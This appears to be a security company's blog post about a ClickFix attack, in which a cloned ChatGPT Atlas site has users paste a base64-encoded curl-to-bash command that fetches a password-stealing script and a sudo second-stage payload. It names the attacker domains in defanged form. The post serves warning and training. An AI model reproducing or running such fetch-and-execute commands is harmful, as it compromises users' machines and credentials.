The TL;DR
- Over the holiday, I happened upon a fake ChatGPT Atlas site
- The site’s instructions led me to password-stealing malware—a ClickFix attack!
- The attack bypasses all the good endpoint protections
- It’s a perfect storm: site cloning, trusted hosting, obfuscated commands, and privilege escalation
- Scroll down for a free video to warn your team about this type of attack
Over the Thanksgiving holiday, I embarked on a small project to evaluate AI browsers, including the buzzy ChatGPT Atlas. Like most people, I clicked the first result I saw: a sponsored link. The page looked nearly identical to the real Atlas site: same layout, design, copy. The only subtle giveaway was the domain: a Google Sites URL. That’s increasingly common in modern phishing kits—tools like v0.dev make it trivial to clone a legitimate site in minutes, and hosting on Google Sites adds a false sense of credibility for anyone who thinks Google = trustworthy. Given our work here at Fable, I was pretty excited to have stumbled on this, and decided to give it a whirl and see just how much damage I could cause.
Instead of getting a standard installer (.dmg), the fake site asked me to paste a command into Terminal. (By the way, this is the point where most people—especially curious or rushed users—might comply. And that’s exactly what attackers count on.) The command itself looked cryptic but harmless: a base64-encoded string passed into curl and executed with bash. But it got nefarious pretty quickly: it decoded to a remote script hosted at https://tenkmo[dot]com/gdrive, a domain controlled by the attacker.
The downloaded script repeatedly prompted for my macOS password until the correct one was entered. Here’s the script:
Once captured, it used that password to run a second-stage payload from https://shrimpfc[dot]com/drive/update with elevated privileges (sudo). That payload—which VirusTotal confirms is malicious—was then free to do whatever it wanted.
Mystery solved! It’s a variation of an attack we’ve seen before: ClickFix. Notably, neither CrowdStrike nor SentinelOne flagged it on download. This is becoming more common: social engineering plus user-granted execution can bypass even strong endpoint defenses.
This should go without saying, but do not try this at home! This attack is a textbook example of how modern phishing blends AI-generated site cloning, trusted hosting platforms, obfuscated commands, and privilege escalation—all without a single traditional “phishing email.” It also illustrates a critical truth: users don’t need to fall for an email spoof anymore; simply searching for something and clicking the wrong sponsored link can lead to compromise.
We’ve created a short, practical briefing video on ClickFix that you can download for free and share with your team. It walks through why you should never run command-line instructions provided by a website, how attackers disguise malicious installers, and how to verify software safely.
Use the button below to download this briefing, and share it with your team.
